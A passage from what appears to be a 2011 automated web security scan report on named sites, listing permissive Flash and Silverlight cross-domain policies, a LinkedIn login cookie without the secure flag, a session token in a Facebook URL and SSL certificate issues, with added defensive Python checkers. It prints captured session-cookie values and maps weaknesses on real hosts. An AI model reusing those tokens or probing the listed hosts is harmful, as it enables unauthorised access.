Confidence:   Certain
Host:   http://www.meebo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.meebo.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 04 Sep 2011 01:10:22 GMT
Content-Type: text/xml; charset=utf-8
Content-Length: 303
Last-Modified: Tue, 09 Aug 2011 21:34:10 GMT
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="www.meebo.com"/>
<allow-access-from domain="*.meebo.com"/>
<allow-access-from domain="meebo.com"/>
<allow-access-from domain="*.meebome.com"/>
<allow-access-from domain="www.meebome.com"/>
<allow-access-from domain="meebome.com"/>
...[SNIP]...

6.61. http://www.reuters.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.reuters.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:47:47 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 04 Sep 2011 00:52:47 GMT
browser-expires: Sun, 4 Sep 2011 00:47:47 GMT
Content-Type: text/xml;charset=UTF-8
Content-Length: 857
Vary: Accept-Encoding
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.reuters.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.reutersmedia.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="ad.uk.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="m.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="m2.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="feedroom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="creatives.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cooliris.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.oho.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.metacarta.com" secure="false"/>
...[SNIP]...

6.62. http://www.sacbee.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sacbee.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sacbee.com

Response

HTTP/1.0 200 OK
Last-Modified: Mon, 15 Aug 2011 23:32:59 GMT
ETag: "a12c7f-175-4e49acab"
Server: Apache/1.3.41
Content-Type: application/xml
Cache-Control: max-age=154
Date: Sun, 04 Sep 2011 00:58:05 GMT
Content-Length: 373
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
   "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.sacbee.com"/>
   <allow-access-from domain="*.mcclatchyinteractive.com"/>
   <allow-access-from domain="*.vmixcore.com"/>
...[SNIP]...

6.63. http://www.youtube.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.youtube.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Fri, 03 Jun 2011 20:25:01 GMT
Date: Sun, 04 Sep 2011 00:55:45 GMT
Expires: Sun, 04 Sep 2011 00:55:45 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

<?xml version="1.0"?>
<!-- http://www.youtube.com/crossdomain.xml -->
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="s.ytimg.com" />
...[SNIP]...

6.64. http://api.twitter.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:46:53 GMT
Server: hi
Status: 200 OK
Last-Modified: Mon, 29 Aug 2011 17:35:22 GMT
Content-Type: application/xml
Content-Length: 561
Cache-Control: max-age=1800
Expires: Sun, 04 Sep 2011 01:16:53 GMT
Vary: Accept-Encoding
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="twitter.com" />
...[SNIP]...
<allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

6.65. http://sales.reuters.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.reuters.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: sales.reuters.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:41:04 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 05 Oct 2009 20:10:04 GMT
ETag: "176c414-1aa-47535b304df00"
Accept-Ranges: bytes
Content-Length: 426
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="sales.reuters.com" />
   <allow-access-from domain="in.sales.reuters.com" />
   <allow-access-from domain="cn.sales.reuters.com" />
...[SNIP]...

7. Silverlight cross-domain policy  previous  next
There are 9 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.
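
Added example (not scanner output and not code from any of the sites above): a small classifier that reads either policy format, Flash crossdomain.xml (section 6) or Silverlight clientaccesspolicy.xml (section 7), and rates the grants on the same scale the report uses: a grant to any domain is High, a wildcard grant is Low, a named domain is Information. The sample policies are constructed from the findings above and abridged to a few entries; the extra notes cover two options that widen exposure beyond the domain list, Flash's secure="false" and Silverlight's http-request-headers="*", plus a Flash site-control meta-policy other than master-only.

```python
"""Classify Flash (crossdomain.xml) and Silverlight (clientaccesspolicy.xml)
cross-domain policies: who is granted two-way access and how serious the
grant is.  Added example; the sample policies are constructed from the
findings in this report and abridged."""
import xml.etree.ElementTree as ET

FLASH_MEEBO = """<cross-domain-policy>
<allow-access-from domain="www.meebo.com"/>
<allow-access-from domain="*.meebo.com"/>
<allow-access-from domain="meebo.com"/>
</cross-domain-policy>"""

FLASH_REUTERS = """<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.reuters.com" secure="false"/>
<allow-access-from domain="ad.doubleclick.net" secure="false"/>
</cross-domain-policy>"""

SILVERLIGHT_OPEN = """<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true"/>
</grant-to>
</policy>
</cross-domain-access>
</access-policy>"""


def parse_policy(xml_text):
    """Return (grants, meta): grants is a list of (origin, attrs); meta holds
    the Flash site-control setting when the policy declares one."""
    root = ET.fromstring(xml_text)
    grants, meta = [], {}
    if root.tag == "cross-domain-policy":                       # Flash
        sc = root.find("site-control")
        if sc is not None:
            meta["site-control"] = sc.get("permitted-cross-domain-policies", "")
        for el in root.iter("allow-access-from"):
            grants.append((el.get("domain", ""), {"secure": el.get("secure", "true")}))
    elif root.tag == "access-policy":                           # Silverlight
        for allow in root.iter("allow-from"):
            hdrs = allow.get("http-request-headers", "")
            for d in allow.iter("domain"):
                grants.append((d.get("uri", ""), {"headers": hdrs}))
    else:
        raise ValueError("not a Flash or Silverlight policy: <%s>" % root.tag)
    return grants, meta


def classify(origin):
    """'any-domain' for '*' (or 'http://*'), 'wildcard' for '*.example.com',
    'specific' for a fully named host."""
    host = origin.split("://", 1)[-1]
    if host == "*":
        return "any-domain"
    if "*" in host:
        return "wildcard"
    return "specific"


RANK = {"Information": 0, "Low": 1, "High": 2}
SEVERITY = {"any-domain": "High", "wildcard": "Low", "specific": "Information"}


def assess(xml_text):
    """Summarise one policy as (severity, notes) on the report's scale; the
    notes also flag options that widen the exposure beyond the domain list."""
    grants, meta = parse_policy(xml_text)
    severity, notes = "Information", []
    for origin, attrs in grants:
        kind = classify(origin)
        notes.append("%s: %s grant" % (origin, kind))
        if attrs.get("secure") == "false":
            # Only meaningful for a policy served over HTTPS: it lets SWFs
            # loaded over plain HTTP read the HTTPS site's data.
            notes.append('%s: secure="false" lets http:// SWFs reach https:// data' % origin)
        if attrs.get("headers") == "*":
            notes.append("%s: any request header may be sent cross-domain" % origin)
        if RANK[SEVERITY[kind]] > RANK[severity]:
            severity = SEVERITY[kind]
    sc = meta.get("site-control")
    if sc and sc not in ("master-only", "none"):
        notes.append("site-control %s: non-master policy files elsewhere on the host can widen access" % sc)
    return severity, notes


if __name__ == "__main__":
    for label, policy in (("meebo", FLASH_MEEBO), ("reuters", FLASH_REUTERS),
                          ("silverlight", SILVERLIGHT_OPEN)):
        print(label, assess(policy))
```

To run this against a live host, fetch /crossdomain.xml and /clientaccesspolicy.xml from the site root and pass the body to assess(); a policy that is reachable only under a non-root path is not the master policy and is governed by the site-control setting.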


7.1. http://b.scorecardresearch.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Mon, 05 Sep 2011 00:49:46 GMT
Date: Sun, 04 Sep 2011 00:49:46 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

7.2. http://content.usatoday.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.usatoday.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: content.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 03 Mar 2010 16:58:39 GMT
Accept-Ranges: bytes
ETag: "80964c5f2baca1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:48:05 GMT
Connection: close
Content-Length: 730

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="Content-Type,SOAPAction">
               <domain uri="*"/>

...[SNIP]...

7.3. http://metrics.sprint.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.sprint.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: metrics.sprint.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:47:40 GMT
Server: Omniture DC/2.0.0
xserver: www398
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.4. http://nmsacramento.112.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nmsacramento.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: nmsacramento.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:04:36 GMT
Server: Omniture DC/2.0.0
xserver: www597
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.5. http://pixel.quantserve.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Mon, 05 Sep 2011 01:00:45 GMT
Content-Type: text/xml
Content-Length: 312
Date: Sun, 04 Sep 2011 01:00:45 GMT
Server: QS

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
   <domain uri="*"/>
</allow-from>
<grant-to>
   <resour
...[SNIP]...

7.6. http://s0.2mdn.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 04 Sep 2011 00:00:20 GMT
Expires: Fri, 02 Sep 2011 23:16:39 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 3106
Cache-Control: public, max-age=86400

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

7.7. http://secure-us.imrworldwide.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 00:58:36 GMT
Content-Type: text/xml
Content-Length: 255
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
Connection: close
Expires: Sun, 11 Sep 2011 00:58:36 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...

7.8. http://usatoday1.112.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usatoday1.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: usatoday1.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:50:37 GMT
Server: Omniture DC/2.0.0
xserver: www46
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

7.9. http://wa.proflowers.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wa.proflowers.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: wa.proflowers.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:07:03 GMT
Server: Omniture DC/2.0.0
xserver: www381
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

8. SSL cookie without secure flag set  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.linkedin.com
Path:   /secure/login

Issue detail

The following cookies were issued by the application and do not have the secure flag set (see the Set-Cookie headers in the response below, none of which carries a Secure attribute). One of them appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

Request

GET /secure/login HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: sl="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: leo_auth_token="GST:92Y5C7-Duxr1zGVs1Wv1YxDhPErhhqpepcYFrtwDfIrhAIVsQxwMUh:1315099155:0c843f0a96a8006c044aa7d63d7ac676a0c1e9e0"; Version=1; Max-Age=1799; Expires=Sun, 04-Sep-2011 01:49:14 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:19:15 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19965c45525d5f4f58455e445a4a421968;expires=Sun, 04-Sep-2011 01:51:45 GMT;path=/;httponly
Content-Length: 16499

<!DOCTYPE html>
<html lang="en">
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=9">
<meta name="p
...[SNIP]...

9. Session token in URL  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string. Note that the request carries placeholder values (api_key=your app id, app_id=your app id) and the server answered "Invalid Application ID", so confirm that the flagged parameter is a live token rather than SDK boilerplate before treating this as a real exposure.

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
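
Added example (not scanner output): the leak path the background text describes, run as detection logic over constructed access-log lines. A token placed in a query string is written to the server's own log on the request line, and then written again, to the same log or to a third party's, when the page that carried it is the Referer of the next request. The log lines, hostnames and token values are made up for the example; PHPSESSID is a common session-cookie name used here as a URL parameter. The placeholder parameters from the Facebook request above are included to show they do not trigger the heuristic.

```python
"""Flag session-token-looking values in URL query strings, in request lines
and in Referer headers, over constructed access-log lines.  Added example;
the log lines and token values are invented."""
import re
from urllib.parse import urlsplit, parse_qsl

TOKEN_PARAM = re.compile(r"sess|sid|token|auth|jsessionid|phpsessid", re.I)
LOG_LINE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<url>\S+) HTTP/[\d.]+" \d+ \d+ "(?P<referer>[^"]*)"')

# Constructed combined-format log: a token in the request line, the same
# token arriving via Referer on the next request, and a clean request using
# the placeholder parameters seen in the Facebook request above.
SAMPLE_LOG = """\
10.0.0.5 - - [04/Sep/2011:00:48:38 +0000] "GET /account?PHPSESSID=a3f1c9e2b7d44e6f9c0a1b2d3e4f5a6b HTTP/1.1" 200 512 "-"
10.0.0.5 - - [04/Sep/2011:00:48:40 +0000] "GET /help?page=2 HTTP/1.1" 200 128 "http://app.example.com/account?PHPSESSID=a3f1c9e2b7d44e6f9c0a1b2d3e4f5a6b"
10.0.0.7 - - [04/Sep/2011:00:49:01 +0000] "GET /extern/login_status.php?api_key=your%20app%20id&display=hidden HTTP/1.1" 200 22 "-"
"""


def token_params(url):
    """Return [(name, value)] for query parameters that look like session
    tokens: a telltale name, or a long value drawn from a wide alphabet."""
    found = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        wide = len(value) >= 20 and len(set(value)) >= 10 and " " not in value
        if TOKEN_PARAM.search(name) or wide:
            found.append((name, value))
    return found


def scan_log(text):
    """Return [(line_no, where, param)] for each token-bearing URL, whether
    it appears on the request line or in the Referer field."""
    hits = []
    for i, line in enumerate(text.splitlines(), 1):
        m = LOG_LINE.search(line)
        if not m:
            continue
        for name, _ in token_params(m.group("url")):
            hits.append((i, "request", name))
        if m.group("referer") != "-":
            for name, _ in token_params(m.group("referer")):
                hits.append((i, "referer", name))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("line %d: token parameter %r in %s" % (hit[0], hit[2], hit[1]))
```

The value heuristic is deliberately loose; in practice it is tuned per application by adding the names of the parameters the application actually uses for its sessions.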

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df42349018%26origin%3Dhttp%253A%252F%252Fblogs.sacbee.com%252Ffe859d48%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df322bc3668%26origin%3Dhttp%253A%252F%252Fblogs.sacbee.com%252Ffe859d48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2c039c9d%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfda0aaa7%26origin%3Dhttp%253A%252F%252Fblogs.sacbee.com%252Ffe859d48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2c039c9d&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df37a882414%26origin%3Dhttp%253A%252F%252Fblogs.sacbee.com%252Ffe859d48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2c039c9d&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df23cc7f5dc%26origin%3Dhttp%253A%252F%252Fblogs.sacbee.com%252Ffe859d48%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2c039c9d&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.159.52
X-Cnection: close
Date: Sun, 04 Sep 2011 00:48:38 GMT
Content-Length: 22

Invalid Application ID

10. SSL certificate  previous  next
There are 4 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.
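
Added example (not scanner output): offline checks for two of the three requirements named above, that the certificate is valid for the server's hostname and for the current date. Whether the issuer chains to a trusted authority needs a trust store and is left out. The hostname rule is the one browsers apply: a single wildcard may stand only for the whole leftmost label, so the *.ehosts.net certificate in finding 10.1 covers sprintlb.ehosts.net but would not cover a deeper name or the bare parent. The validity dates are the ones reported for that certificate, converted from GMT-06:00 to UTC; the scan time is the report's.

```python
"""Hostname and validity-window checks for a server certificate.  Added
example; the dates are those reported above for sprintlb.ehosts.net,
restated in UTC, and the scan time is taken from the report."""
from datetime import datetime, timezone


def hostname_matches(pattern, host):
    """RFC 6125-style matching: case-insensitive, and '*' is accepted only as
    the entire leftmost label of a name with at least three labels."""
    pattern, host = pattern.lower().rstrip("."), host.lower().rstrip(".")
    if "*" not in pattern:
        return pattern == host
    p_labels, h_labels = pattern.split("."), host.split(".")
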